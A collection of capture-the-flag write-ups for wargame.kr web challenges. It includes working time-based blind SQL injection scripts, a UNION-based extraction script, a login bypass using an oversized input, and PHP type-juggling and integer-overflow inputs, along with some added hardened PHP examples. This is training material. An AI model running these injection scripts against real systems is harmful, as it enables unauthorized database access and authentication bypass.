Writeups for most of the wargame.kr challenges
URL: http://wargame.kr/challenge
already got
Open the challenge and the flag is right there in the response headers.
QR CODE PUZZLE
The page shows an image that cannot be read. Viewing the source shows that the image path is URL-encoded:
<script type="text/javascript">
/*<![CDATA[*/
$(function(){
  $('#join_img').attr('src',unescape('.%2f%69%6d%67%2f%71%72%2e%70%6e%67'));
  $('#join_img').jqPuzzle({rows:6,cols:6,shuffle:true,numbers:false,control:false,style:{overlap:false}});
  hide_pz();
});
function hide_pz(){
  var pz=$('#join_img div');
  if(pz[pz.length-2]){
    $(pz[1]).remove();
    $(pz[pz.length-2]).remove();
  }else{
    setTimeout("hide_pz()",5);
  }
}
/*]]>*/
</script>
Decoding %2f%69%6d%67%2f%71%72%2e%70%6e%67 gives /img/qr.png. Opening that path shows the QR code, which leads to a URL, and that gives the flag.
flee button
View the page source to find a link; visiting it directly gives the flag.
login filtering
View the source to get the key code:
if(isset($_POST['id']) && isset($_POST['ps'])){
    include("../lib.php"); # include for auth_code function.

    mysql_connect("localhost","login_filtering","login_filtering_pz");
    mysql_select_db ("login_filtering");
    mysql_query("set names utf8");

    $key = auth_code("login filtering");

    $id = mysql_real_escape_string(trim($_POST['id']));
    $ps = mysql_real_escape_string(trim($_POST['ps']));

    $row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));

    if(isset($row['id'])){
        if($id=='guest' || $id=='blueh4g'){
            echo "your account is blocked";
        }else{
            echo "login ok"."<br />";
            echo "Password : ".$key;
        }
    }else{
        echo "wrong..";
    }
}
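Two accounts are also given:
you have blocked accounts.
guest / guest
blueh4g / blueh4g1234ps
Because mysql_real_escape_string escapes special characters and the encoding is fixed to UTF-8, a bypass through the query is essentially ruled out. That leaves the comparison: the database does not compare strictly by letter case, so changing the case gets past the check. Submitting id=Guest&ps=guest gives the flag.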
WTF_CODE
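The page looks blank, but some of the characters are tabs and some are spaces. Guessing that it is the Whitespace language, decode it with a script: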
# Python 2
def t2i(str):
    # convert an 8-character string of '0'/'1' to an integer
    out = 0
    for i in range(0,8):
        out += int(str[i])*(2**(7-i))
    return out

f = open("C:/Users/lanlan/Desktop/source_code.ws","rb")
x = f.readline()
x = f.readline()
ans=""
k = 0
while x:
    # map space to '0' and every other character to '1'
    out = ''
    for c in x:
        if c==' ':
            out += '0'
        else:
            out += '1'
    x = f.readline()
    l = len(out)
    if 8 <= l <= 11 and k%2 ==0:
        print out
        c = t2i('0'+out[l-8:l-1])
        #print c
        #print chr(c)
        ans+= chr(c)
    k+=1
f.close()
print ans
This gives the flag.
DB is really GOOD
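First determine the database type. Trying various characters through write.php shows that adding / triggers an error, which reveals a SQLite database.
Looking for the pattern shows that the SQLite db file is located at /db/wkrm_username.db; requesting that path directly downloads the db file.
Opening it in Notepad++ eventually reveals a file path.
Visiting that path gives the flag.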
fly me to the moon
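The page is a game that seems to require a very high score, and the hint says to cheat by modifying it. Nothing turns up in the source, so capture the requests step by step.
On the high-scores.php request, change the score to a very large value, and the flag comes back.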
md5_compare
Looking at the source, this is an MD5 weak-type comparison:
if (isset($_GET['v1']) && isset($_GET['v2'])) {
    sleep(3); // anti brute force

    $chk = true;
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if (!ctype_alpha($v1)) {$chk = false;}
    if (!is_numeric($v2) ) {$chk = false;}
    if (md5($v1) != md5($v2)) {$chk = false;}

    if ($chk){
        include("../lib.php");
        echo "Congratulations! FLAG is : ".auth_code("md5_compare");
    } else {
        echo "Wrong...";
    }
}
md5 password
This is a SQL injection that works through the MD5-hashed value; see the link directly.
strcmp
<?php
require("../lib.php"); // for auth_code function

$password = sha1(md5(rand().file_get_contents("/var/lib/dummy_file")).rand());

if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
}else if(isset($_POST['password'])){
    sleep(1); // do not brute force!
    if (strcmp($_POST['password'], $password) == 0) {
        echo "Congratulations! Flag is <b>" . auth_code("strcmp") ."</b>";
        exit();
    } else {
        echo "Wrong password..";
    }
}
?>
This is likewise a weak-type comparison (type confusion).
tmitter
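The page is a mock sign-up and login interface. The hint says to get in as admin, but the password is unknown. The sign-up page gives the hint:
use maximum-length truncation to force a registration as admin and so change the password.
Because trim() strips the spaces at both ends, append a 1 after a run of spaces to get around it, and then use this to force the registration.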
SimpleBoard
First, http://wargame.kr:8080/SimpleBoard/read.php?idx=5 is known to be an injection point. View the source.
The key part:
public function read($idx){
    $idx = mysql_real_escape_string($idx);
    if ($this->read_chk($idx) == false){
        $this->inc_hit($idx);
    }
    return $this->db->get_query("select * from {$this->table} where idx=$idx");
}

private function read_chk($idx){
    if(strpos($_COOKIE['view'], "/".$idx) !== false) {
        return true;
    } else {
        return false;
    }
}
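This shows that when idx is submitted, the cookie must also carry the matching idx part for the request to go through properly.
First look at the database:
the database name is SimpleBoard.
Look at the table names:
the key table is README.
Look at the column names:
the column is flag.
Finally, read the actual value.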
web chatting
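This is a SQL injection challenge. First enter any ID and view the source to find the injection point t=1&ni=0.
Get the database.
Get the tables.
Try chat_log_secret.
Get the flag.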
img recovery
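Opened in Chrome first, which shows:
Opened in Firefox:
Putting the two together gives the QR code. Scanning it gives the password, and logging in finishes the challenge.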
ip log table
Just run sqlmap on it.
lonely_guys
Testing shows that this is an injection after order by; straight to the script:
# Python 2
import requests

url = 'http://wargame.kr:8080/lonely_guys/'

def sendsort(pstr):
    # returns 1 when the response is fast, 0 when the sleep() branch fired
    data = {'sort':pstr}
    s=requests.post(url=url,data=data)
    sec=s.elapsed.seconds
    if sec < 3:
        return 1
    else:
        return 0

TEMPLATE = 'desc,if((ascii(mid((select database() limit 1),%d,1))>%d),1,sleep(2))'
# database len=11 lonely_guys
#TEMPLATE = 'desc,if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),%d,1))>%d),1,sleep(2))'
# table_name len=7 authkey
#TEMPLATE = 'desc,if((ascii(mid((select column_name from information_schema.columns where table_name=0x617574686b6579 limit 1),%d,1))>%d),1,sleep(2))'
#len = 7 authkey
#TEMPLATE = 'desc,if((ascii(mid((select * from authkey limit 1),%d,1))>%d),1,sleep(2))'
# key len = 40

# find the length of the target string
for i in range(1,50):
    if sendsort(TEMPLATE%(i,0)) == 0:
        print i,'OK'
        break
    else:
        print i

flag = []
for i in range(1,41):
    # binary search over the ASCII range for character i
    a = 31
    b = 128
    while abs(a-b)>1:
        c = int((a+b)/2)
        if sendsort(TEMPLATE%(i,c)) == 1:
            a = c
        else:
            b = c
    if sendsort(TEMPLATE%(i,a)) == 0:
        c = a
    else:
        c = b
    print chr(c),
    flag.append(chr(c))
print 'Flag:',''.join(flag)
dmbs335
First look at the source:
<?php
if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
}

include("../lib.php");
include("./inc.php"); // Database Connected

function getOperator(&$operator) {
    switch($operator) {
        case 'and':
        case '&&':
            $operator = 'and';
            break;
        case 'or':
        case '||':
            $operator = 'or';
            break;
        default:
            $operator = 'or';
            break;
    }
}

if(preg_match('/session/isUD',$_SERVER['QUERY_STRING'])) {
    exit('not allowed');
}

parse_str($_SERVER['QUERY_STRING']);
getOperator($operator);
$keyword = addslashes($keyword);
$where_clause = '';

if(!isset($search_cols)) {
    $search_cols = 'subject|content';
}

$cols = explode('|',$search_cols);

foreach($cols as $col) {
    $col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : '';
    if($col) {
        $query_parts = $col . " like '%" . $keyword . "%'";
    }

    if($query_parts) {
        $where_clause .= $query_parts;
        $where_clause .= ' ';
        $where_clause .= $operator;
        $where_clause .= ' ';
        $query_parts = '';
    }
}

if(!$where_clause) {
    $where_clause = "content like '%{$keyword}%'";
}
if(preg_match('/\s'.$operator.'\s$/isDU',$where_clause)) {
    $len = strlen($where_clause) - (strlen($operator) + 2);
    $where_clause = substr($where_clause, 0, $len);
}
?>
<style>
    td:first-child, td:last-child {text-align:center;}
    td {padding:3px; border:1px solid #ddd;}
    thead td {font-weight:bold; text-align:center;}
    tbody tr {cursor:pointer;}
</style>
<br />
<table border=1>
    <thead>
        <tr><td>Num</td><td>subject</td><td>content</td><td>writer</td></tr>
    </thead>
    <tbody>
        <?php
            $result = mysql_query("select * from board where {$where_clause} order by idx desc");
            while ($row = mysql_fetch_assoc($result)) {
                echo "<tr>";
                echo "<td>{$row['idx']}</td>";
                echo "<td>{$row['subject']}</td>";
                echo "<td>{$row['content']}</td>";
                echo "<td>{$row['writer']}</td>";
                echo "</tr>";
            }
        ?>
    </tbody>
    <tfoot>
        <tr><td colspan=4>
            <form method="">
                <select name="search_cols">
                    <option value="subject" selected>subject</option>
                    <option value="content">content</option>
                    <option value="content|content">subject, content</option>
                    <option value="writer">writer</option>
                </select>
                <input type="text" name="keyword" />
                <input type="radio" name="operator" value="or" checked /> or
                <input type="radio" name="operator" value="and" /> and
                <input type="submit" value="SEARCH" />
            </form>
        </td></tr>
    </tfoot>
</table>
<br />
<a href="./?view-source">view-source</a><br />
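After reading a GeekPwn2016 writeup once, the details became clear. This challenge is a little simpler than the GeekPwn2016 one, with less filtering, but they are much the same.
The vulnerability is fairly obvious: parse_str on line 30 causes variable overwriting. On line 43, if $col is false the assignment is skipped, so $query_parts becomes controllable through the variable overwrite. On line 42, $col is the result of a regex match on the input, so $col is controllable and injection is possible.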
if(!isset($search_cols)) {
    $search_cols = 'subject|content';
}

$cols = explode('|',$search_cols);

foreach($cols as $col) {
    $col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : '';
    if($col) {
        $query_parts = $col . " like '%" . $keyword . "%'";
    }
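For this regex, $search_cols only has to be something other than subject|content.
When $col comes back false, $keyword has no effect.
After the analysis, start injecting:
Database
Table
Column
flag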
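A hardened form of the search logic analysed above, as an added example that is not the challenge's code. build_search() is a hypothetical helper, the query string at the bottom is constructed, and the statement it returns is meant for a prepared-statement API.

```php
<?php
// Added example, not challenge code: build_search() is a hypothetical
// replacement for the page's parse_str() + string-building logic.

function build_search(string $query_string): array
{
    // Parse into an array so request keys can never become local variables
    // (the one-argument form is what lets a query_parts key overwrite state).
    $params = [];
    parse_str($query_string, $params);

    $allowed  = ['subject', 'content', 'writer'];
    $operator = (($params['operator'] ?? 'or') === 'and') ? 'AND' : 'OR';

    $keyword = $params['keyword'] ?? '';
    if (!is_string($keyword)) {
        $keyword = '';
    }
    $raw_cols = $params['search_cols'] ?? 'subject|content';
    if (!is_string($raw_cols)) {
        $raw_cols = 'subject|content';
    }

    // Keep only exact allow-list matches; anything else is dropped, and an
    // empty result falls back to a fixed column instead of reusing state.
    $cols = array_values(array_intersect($allowed, explode('|', $raw_cols)));
    if ($cols === []) {
        $cols = ['content'];
    }

    // Column names come from the allow-list; the keyword is only ever bound.
    $parts = [];
    $binds = [];
    foreach ($cols as $col) {
        $parts[] = "$col LIKE ?";
        $binds[] = '%' . $keyword . '%';
    }

    $sql = 'SELECT * FROM board WHERE ' . implode(" $operator ", $parts)
         . ' ORDER BY idx DESC';
    return [$sql, $binds];
}

// Constructed query string: an unknown column plus an extra key named after
// an internal variable. Neither reaches the SQL text.
[$sql, $binds] = build_search('search_cols=nope&keyword=abc&query_parts=x');
echo $sql, "\n";
print_r($binds);
```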
jff3_magic
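This one relies on PHP "magic hashes".
Opening the page shows a popup. Firefox goes straight back, but Chrome opens a blog-like page.
Pressing F12 shows a hint, and the .swp file obtained after downloading is what to read.
The first part reveals a SQL injection point, no, so try constructing a payload directly.
There is some simple filtering, but since the statement just looks up the user, an always-true condition is enough.
Enter a username and password and capture the request.
The password is reported as wrong, and the hash value that comes back is fixed and does not change.
Try an online site to crack it.
Look up the magic number that goes with the hash type it belongs to.
Then entering the corresponding value is enough.
Related reading:
http://bobao.360.cn/learning/detail/398.html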
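The loose comparisons behind md5_compare, strcmp and jff3_magic next to strict replacements, as an added example that is not part of any challenge source. The digest strings are constructed placeholders in the "0e followed by digits" shape, and the three function names are hypothetical.

```php
<?php
// Added example, not challenge code. The digest values below are constructed
// placeholders with the "0e<digits>" shape; they are not real MD5 outputs.

// Loose check in the style of md5_compare / jff3_magic: "==" on two
// numeric-looking strings compares them as numbers, and any 0e<digits>
// string is read as zero in exponent notation.
function loose_digest_equal(string $a, string $b): bool
{
    return $a == $b;
}

// Strict check: byte-for-byte and constant-time, no numeric interpretation.
function strict_digest_equal(string $a, string $b): bool
{
    return hash_equals($a, $b);
}

// Hardened form of the strcmp() check: request parameters can arrive as
// arrays as well as strings, so reject non-strings first, then compare
// strictly instead of testing strcmp(...) == 0.
function verify_secret($submitted, string $expected): bool
{
    if (!is_string($submitted)) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

$d1 = '0e' . str_repeat('1', 30); // constructed digest-shaped string
$d2 = '0e' . str_repeat('2', 30); // constructed, differs from $d1

// Same two inputs through the loose and the strict comparison.
var_dump(loose_digest_equal($d1, $d2));
var_dump(strict_digest_equal($d1, $d2));

// An array where a string is expected, then a genuine match.
var_dump(verify_secret(['x'], 'secret'));
var_dump(verify_secret('secret', 'secret'));
```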
adm1nkyj
Open the source:
<?php
error_reporting(0);

include("./config.php"); // hidden column name
include("../lib.php"); // auth_code function

mysql_connect("localhost","adm1nkyj","adm1nkyj_pz");
mysql_select_db("adm1nkyj");

/**********************************************************************************************************************/

function rand_string(){
    $string = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz";
    return str_shuffle($string);
}

function reset_flag($count_column, $flag_column){
    $flag = rand_string();
    $query = mysql_fetch_array(mysql_query("SELECT $count_column, $flag_column FROM findflag_2"));
    if($query[$count_column] == 150){
        if(mysql_query("UPDATE findflag_2 SET $flag_column='{$flag}';")){
            mysql_query("UPDATE findflag_2 SET $count_column=0;");
            echo "reset flag<hr>";
        }
        return $flag;
    }else{
        mysql_query("UPDATE findflag_2 SET $count_column=($query[$count_column] + 1);");
    }
    return $query[$flag_column];
}

function get_pw($pw_column){
    $query = mysql_fetch_array(mysql_query("select $pw_column from findflag_2 limit 1"));
    return $query[$pw_column];
}

/**********************************************************************************************************************/

$tmp_flag = "";
$tmp_pw = "";
$id = $_GET['id'];
$pw = $_GET['pw'];
$flags = $_GET['flag'];
if(isset($id)){
    if(preg_match("/information|schema|user/i", $id) || substr_count($id,"(") > 1) exit("no hack");
    if(preg_match("/information|schema|user/i", $pw) || substr_count($pw,"(") > 1) exit("no hack");
    $tmp_flag = reset_flag($count_column, $flag_column);
    $tmp_pw = get_pw($pw_column);
    $query = mysql_fetch_array(mysql_query("SELECT * FROM findflag_2 WHERE $id_column='{$id}' and $pw_column='{$pw}';"));
    if($query[$id_column]){
        if(isset($pw) && isset($flags) && $pw === $tmp_pw && $flags === $tmp_flag){
            echo "good job!!<br />FLAG : <b>".auth_code("adm1nkyj")."</b><hr>";
        }else{
            echo "Hello ".$query[$id_column]."<hr>";
        }
    }
} else {
    highlight_file(__FILE__);
}
?>
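Clearly id and pw are injectable, and no symbols are filtered, so take id as the way in and first work out how many columns there are.
There are 5 columns in total.
Look at the filter statements: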
if(preg_match("/information|schema|user/i", $id) || substr_count($id,"(") > 1) exit("no hack");
if(preg_match("/information|schema|user/i", $pw) || substr_count($pw,"(") > 1) exit("no hack");
$tmp_flag = reset_flag($count_column, $flag_column);
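It filters the keywords information|schema|user and (.
So first try getting ( through with encoding.
Success.
The second column is the one that is displayed. Since so much is filtered, the usual approach does not work.
Use a rotating SQL query instead, placing the value of each column into the displayed position in turn.
Note: the aliases must match, and what follows from must be a table, so an alias is required.
Get id.
Get pw.
Get flag.
Get the final flag.
Note: since # is a comment in the statement, it has to be encoded.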
QnA
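Capture the request. There are POST values at the bottom, so try them as injection points.
The response is delayed, so type is the injection point; go straight to blind injection.
Script: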
# Python 2
import urllib, urllib2, time
import string

headers = {'Host': 'wargame.kr:8080'}
url = "http://wargame.kr:8080/qna/?page=to_jsmaster"
dic="qwertyuiopasdfghjklzxcvbnm0123456789"
flag=''
for i in range(1,50):
    for j in dic:
        data = "cont=input+contents%21&mail=1&type="
        #data = data + "if((select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={},sleep(5),1)".format(0,j)
        #data = data + "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1),{},1))={}),sleep(5),1)".format(i,ord(j))
        #data = data + "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x617574686b6579 limit 1),{},1))={}),sleep(5),1)".format(i,ord(j))
        #data = data + "if(length(select authkey from authkey limit 1)={},sleep(4),1)".format(i)
        data = data + "if((ascii(mid((select authkey from authkey limit 1),{},1))={}),sleep(3),1)".format(i,ord(j))
        #print data
        req = urllib2.Request(url, data, headers)
        response = urllib2.urlopen(req)
        # time the second request to detect the sleep() branch
        start_time = time.time()
        response = urllib2.urlopen(req).read()
        times = time.time() - start_time
        if times > 2:
            flag += j
            print flag
            #print i
            break
#7
#authkey
#authkey
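The most annoying thing about this challenge is that the brute force failed every time my network was slow. Frustrating, unlucky network speed.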
zairo
The source is available:
<?php
error_reporting(0);

include("./config.php"); // hidden column name
include("../lib.php"); // auth_code function

mysql_connect("localhost","zairo","zairo_pz");
mysql_select_db("zairo");

/**********************************************************************************************************************/

function rand_string(){
    $string = "1234567890abcdefghijklmnopqrstuvwxyz";
    return str_shuffle($string);
}

function reset_flag($count_column, $flag_column){
    global $count;
    $flag = rand_string();
    $query = mysql_fetch_array(mysql_query("SELECT $count_column, $flag_column FROM findflag_2"));
    $count = $query[$count_column];
    if($query[$count_column] == 150){
        if(mysql_query("UPDATE findflag_2 SET $flag_column='{$flag}';")){
            mysql_query("UPDATE findflag_2 SET $count_column=0;");
            echo "reset flag<hr>";
        }
        return $flag;
    }else{
        mysql_query("UPDATE findflag_2 SET $count_column=($query[$count_column] + 1);");
    }
    return $query[$flag_column];
}

function get_pw($pw_column){
    $query = mysql_fetch_array(mysql_query("select $pw_column from findflag_2 limit 1"));
    return $query[$pw_column];
}

/**********************************************************************************************************************/

$tmp_flag = "";
$tmp_pw = "";
$id = $_GET['id'];
$pw = $_GET['pw'];
$flags = $_GET['flag'];
$count = 0;
if(isset($id)){
    if(preg_match("/information|schema|user|where|=/i", $id) || substr_count($id,"(") > 0) exit("no hack");
    if(preg_match("/information|schema|user|where|=/i", $pw) || substr_count($pw,"(") > 0) exit("no hack");
    $tmp_flag = reset_flag($count_column, $flag_column);
    $tmp_pw = get_pw($pw_column);
    $query = mysql_fetch_array(mysql_query("SELECT * FROM findflag_2 WHERE $id_column='{$id}' and $pw_column='{$pw}';"));
    echo "<hr />NOW COUNT = {$count}<br />";
    if($query[$id_column]){
        if(isset($pw) && isset($flags) && $pw === $tmp_pw && $flags === $tmp_flag){
            echo "good job!!<br />FLAG : <b>".auth_code("zairo")."</b><hr>";
        }else{
            echo "Hello ".$query[$id_column]."<hr>";
        }
    }
}else {
    highlight_file(__FILE__);
}
?>
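First check how many columns there are.
There are 5 columns. This time my two-step query ran into problems, so I could only search Google for other techniques.
Found one.
Finally, looking at someone else's writeup script: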
#!/usr/bin/env python
# -*- coding: utf8 -*-
import re, sys, time, urllib, urllib2

headers = {'Host': 'wargame.kr:8080'}
s = "0123456789abcdefghijklmnopqrstuvwxyz"
chars = list(s)[::-1]
ans = ""
while True and len(chars):
    lo = 0
    hi = len(chars)
    guessed = []
    while lo <= hi:
        time.sleep(0.01)
        mid = (lo + hi) // 2
        char = chars[mid]
        if char in guessed:
            ans += char
            chars.remove(char)
            break
        charless = list(chars)
        charless.remove(char)
        guess = "{0}{1}{2}".format(ans, char, ''.join(charless))
        guessed.append(char)
        id = urllib.quote("'UNION SELECT * FROM findflag_2/*")
        pw = urllib.quote("*/UNION SELECT 1,2,3,\"{}\",5 ORDER BY 4 ASC#".format(guess))
        data = "?id={0}&pw={1}&flag=".format(id, pw)
        req = urllib2.Request("http://wargame.kr:8080/zairo/" + data, '', headers)
        response = urllib2.urlopen(req)
        res = response.read()
        count = re.findall(r"NOW COUNT = (\d+)", res)[0]
        if "reset" in res:
            sys.exit("[!] FAILED: FLAG RESET")
        if "zairowkdlfhdkel" in res:
            lo = mid
        else:
            hi = mid
        print "{0}\t{1}\t{2}\t{3}\t{4}".format(guess, hi, lo, mid, count)
    pass
req = urllib2.Request("http://wargame.kr:8080/zairo/?id=zairowkdlfhdkel&pw=wkdlfhpw!!@%%%23@@%23&flag={0}".format(guess), '', headers)
response = urllib2.urlopen(req).read()
flag = re.findall(r"FLAG : <b>([0-9a-f]+)</b>", response)
print "[*] OUR GUESS: {0}".format(guess)
print "[!] SUCCESS! FLAG: {0}".format(flag[0])
This gives the flag.
login with crypto! but..
View the source:
<?php
if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
}

include("../lib.php"); // include for auth_code function.
/*******************************************************
- DB SCHEMA (initilizing)

create table accounts(
 idx int auto_increment primary key,
 user_id varchar(32) not null unique,
 user_ps varchar(64) not null,
 encrypt_ss text not null
);

********************************************************/

function db_conn(){
    mysql_connect("localhost","login_with_cryp","login_with_crypto_but_pz");
    mysql_select_db("login_with_crypto_but");
}

function init(){
    db_conn();
    $password = crypt(rand().sha1(file_get_contents("/var/lib/dummy_file").rand())).rand();
    mysql_query("insert into accounts values (null,'admin','{$password}','".sucker_enc('881114')."')"); // admin`s password is secret! xD
    mysql_query("insert into accounts values (null,'guest','guest','".sucker_enc('000000')."')");
}
//init(); // create user for initializing

function enc($str){
    $s_key = "L0V3LySH:";
    $s_vector_iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_3DES, MCRYPT_MODE_ECB), MCRYPT_RAND);
    $en_str = mcrypt_encrypt(MCRYPT_3DES, $s_key, $str, MCRYPT_MODE_ECB, $s_vector_iv);
    $en_base64 = base64_encode($en_str);
    $en_hex = bin2hex($en_str);
    return $en_hex;
}

function sucker_enc($str){
    for($i=0;$i<8;$i++) $str = enc($str);
    return $str;
}

function get_password($user,$ssn){
    db_conn();
    $user = mysql_real_escape_string($user);
    $ssn = mysql_real_escape_string($ssn);
    $result = mysql_query("select user_ps from accounts where user_id='{$user}' and encrypt_ss='".sucker_enc($ssn)."'");
    $row = mysql_fetch_array($result);
    if ($row === false) {
        die("there is not valid account!");
    }
    return $row[0];
}

ini_set("display_errors", true);

if( (isset($_POST['user']) && isset($_POST['ssn']) && isset($_POST['pass'])) ){
    sleep(2); // do not bruteforce !!!! this challenge is not for bruteforce!!
    if($_POST['pass'] == get_password($_POST['user'],$_POST['ssn'])){
        if($_POST['user'] == "admin"){
            echo "Login Success!!! PASSWORD IS : <b>".auth_code("login with crypto! but..")."</b>";
        }else{
            echo "Login Success. but you r not 'admin'..";
        }
    }else{
        echo "Login Failed";
    }
}
?>
<hr />
<form method="post" action="./index.php">
<table>
<tr><td>Identify</td><td><input type='text' value='guest' maxlength='32' name='user' /></td>
<tr><td>Social Security</td><td><input type='text' maxlength='6' value='000000' name='ssn' /></td>
<tr><td>PASSWORD</td><td><input type='text' value='guest' name='pass' /></td>
<tr><td colspan="2"><input type="submit" value="Login" /></td></tr>
</table>
</form>
<hr />
<a href='./?view-source'>GET SOURCE</a>
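The form needs user, ssn and pass, but pass goes through 3DES encryption in ECB mode using ssn and user, applied 8 times, followed by base64 encoding and hex encoding. Seen this way, decrypting it is clearly not the intended route: a scheme this convoluted generally cannot be reversed, so another way in has to be found.
Then one spot in the code stands out: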
if ($row === false) {die("there is not valid account!");}
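Surprisingly, there is a flawed comparison here; it looks like row needs to come back as false.
Some searching on Baidu shows that mysql_query raises an error and returns false when it receives overly long data, so mysql_fetch_array returns NULL, which gets past the strict type comparison.
Script: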
#!/usr/bin/env python
# -*- coding: utf8 -*-
import requests

data = {"user":'admin',"pass":'',"ssn":'1'*100000}
req = requests.post("http://wargame.kr:8080/login_with_crypto_but/index.php", data)
print req.text
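A login path that fails closed when the lookup fails, as an added example that is not the challenge's code. It assumes PDO with an in-memory SQLite database standing in for the MySQL accounts table; the rows, MAX_SSN_LEN and the function names are constructed for illustration, and the ssn column is stored unencrypted to keep the example short.

```php
<?php
// Added example, not challenge code. Uses an in-memory SQLite database via
// PDO as a stand-in for the MySQL accounts table; rows are constructed and
// the plaintext password only mirrors the page's schema.

const MAX_SSN_LEN = 6; // same limit as the form's maxlength, enforced server-side

function open_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    // Any query failure raises an exception instead of returning false.
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE accounts (user_id TEXT UNIQUE, user_ps TEXT, ssn TEXT)');
    $db->exec("INSERT INTO accounts VALUES ('guest', 'guest', '000000')");
    return $db;
}

// Returns the stored password, or null when there is no matching account.
function get_password(PDO $db, string $user, string $ssn): ?string
{
    $stmt = $db->prepare('SELECT user_ps FROM accounts WHERE user_id = ? AND ssn = ?');
    $stmt->execute([$user, $ssn]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    // Treat anything that is not a row (false, null) as "no account".
    return is_array($row) ? (string) $row[0] : null;
}

function login(PDO $db, $user, $ssn, $pass): bool
{
    // Fail closed on wrong types and oversized input before touching the DB.
    if (!is_string($user) || !is_string($ssn) || !is_string($pass)) {
        return false;
    }
    if (strlen($ssn) > MAX_SSN_LEN || $pass === '') {
        return false;
    }
    try {
        $stored = get_password($db, $user, $ssn);
    } catch (PDOException $e) {
        return false; // a failed query is a failed login, never a match
    }
    // Strict comparison: a missing row can no longer equal an empty submission.
    return $stored !== null && hash_equals($stored, $pass);
}

$db = open_db();
// Constructed inputs: a valid guest login, then an oversized ssn with an
// empty password.
var_dump(login($db, 'guest', '000000', 'guest'));
var_dump(login($db, 'guest', str_repeat('1', 100000), ''));
```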
php?c?
Source:
<?php
if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
}
require("../lib.php"); // include for auth_code function.
if(isset($_POST['d1']) && isset($_POST['d2'])){
    $input1=(int)$_POST['d1'];
    $input2=(int)$_POST['d2'];
    if(!is_file("/tmp/p7")){exec("gcc -o /tmp/p7 ./p7.c");}
    $result=exec("/tmp/p7 ".$input1);
    if($result!=1 && $result==$input2){echo auth_code("php? c?");}else{echo "try again!";}
}else{echo ":p";}
?>
<style>
    table {background-color:#000; color:#fff;}
    td {background-color:#444;}
</style>
<hr />
<center>
    <form method='post'>
        <table>
            <tr><td>D1:</td><td><input type='text' id="firstf" style="width:75px;" maxlength="9" name='d1'></td></tr>
            <tr><td>D2:</td><td><input type='text' style="width:75px;" name='d2'></td></tr>
            <tr><td colspan="2" style="text-align:center;"><input type='submit' value='try'></td></tr>
        </table>
    </form>
    <div><a href='?view-source'>get source</a></div>
</center>
<script>document.getElementById("firstf").focus();</script>
Open the file it refers to:
#include <stdio.h>
#include <stdlib.h>
void nono();
int main(int argc,char **argv){
    int i;
    if(argc!=2){nono();}
    i=atoi(argv[1]);
    if(i<0){nono();}
    i=i+5;
    if(i>4){nono();}
    if(i<5){printf("%d",i);}
    return 0;
}
void nono(){
    printf("%d",1);
    exit(1);
}
This challenge is an int overflow.
For a 32-bit int, the maximum value is
2^31-1=2147483647
Adding 5 overflows and produces a negative number.
Test it locally:
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
using namespace std;
int main(int argc,char **argv)
{
    int i;
    i=2147483646;
    i=i+5;
    if(i<5){printf("%d",i);}
    return 0;
}
It returns
-2147483645
So submit D1=2147483646&D2=-2147483645
to get the result.
Note: D1 has a length limit, which has to be removed first.
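Server-side range validation for D1 that keeps the "i = i + 5" step in p7.c inside a 32-bit int, as an added example that is not the challenge's code. parse_d1(), p7_command() and the two constants are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not challenge code. parse_d1() and p7_command() are
// hypothetical helpers; P7_ADDEND mirrors the "i = i + 5" step in p7.c.

const INT32_MAX = 2147483647;
const P7_ADDEND = 5;

// Accept only a decimal integer in a range where adding P7_ADDEND cannot
// exceed a 32-bit signed int. Returns null for anything else. The form's
// maxlength attribute is a browser-side hint, so the bound is checked here.
function parse_d1($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => INT32_MAX - P7_ADDEND],
    ]);
    return $value === false ? null : $value;
}

// Build the command line only from a validated value, quoted for the shell.
function p7_command($raw): ?string
{
    $d1 = parse_d1($raw);
    if ($d1 === null) {
        return null;
    }
    return '/tmp/p7 ' . escapeshellarg((string) $d1);
}

// Constructed inputs: an ordinary value, the largest accepted value, one
// past it, and a string that is not a plain integer.
foreach (['7', '2147483642', '2147483643', '12abc'] as $sample) {
    var_dump(p7_command($sample));
}
```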